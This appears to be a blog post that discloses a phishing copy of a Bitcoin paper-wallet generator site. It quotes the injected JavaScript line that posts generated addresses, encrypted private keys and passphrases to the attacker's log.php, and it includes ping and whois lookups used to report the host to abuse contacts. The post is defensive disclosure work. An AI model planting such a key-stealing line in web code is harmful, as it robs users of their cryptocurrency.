Example of "phishing" Bitcoin wallet generator - walletgenerator.org
The website on walletgenerator.org is a modified version (phishing replica) of walletgenerator.net.
The phishing site is stealing the private keys and the pass-phrases.
Look in the code for lines like these:
var http = new XMLHttpRequest(); http.open("POST", "log.php", true); http.send(generatedAddress + "," + Bitcoin.Base58.encode(encryptedKey) + "-" + document.currentBipPassphrase + "," + janin.selectedCurrency.name);
Also, on the phishing website the security warning is missing:
You appear to be running this generator off of a live website, which is not recommended for creating valuable wallets. Instead, use the download link at the bottom of this page to download the ZIP file from GitHub and run this generator offline as a 'local' HTML file.
The phishing wallet generator:
Some differences in the code (shown with meld):
I copied the code on pastebin in case someone wants to study it: https://pastebin.com/wmvZuSND
It looks like it's hosted by Sourceway.de. I notified them.
valentin@computer:~$ ping walletgenerator.org -c 1 PING walletgenerator.org (18.104.22.168) 56(84) bytes of data. 64 bytes from web.sourceway.de (22.214.171.124): icmp_seq=1 ttl=61 time=46.8 ms --- walletgenerator.org ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 46.895/46.895/46.895/0.000 ms valentin@computer:~$
valentin@computer:~$ ping web.sourceway.de -c 1 PING web.sourceway.de (126.96.36.199) 56(84) bytes of data. 64 bytes from web.sourceway.de (188.8.131.52): icmp_seq=1 ttl=61 time=46.6 ms --- web.sourceway.de ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 46.655/46.655/46.655/0.000 ms
Also, I sent email to the Registrar's abuse email address.
valentin@computer:~$ whois cronon.net | grep abuse Registrar Abuse Contact Email: email@example.com valentin@computer:~$
I got this response from the web hosting provider: Stealing Bitcoin "is nothing illegal, but morally wrong" - WTF?
UpdateIt still works (10 April 2018), the web hosting is changed:
$ resolveip walletgenerator.org IP address of walletgenerator.org is 184.108.40.206 $ whois 220.127.116.11 | grep -i abuse % Abuse contact for '18.104.22.168 - 22.214.171.124' is 'firstname.lastname@example.org' abuse-c: AR18916-RIPE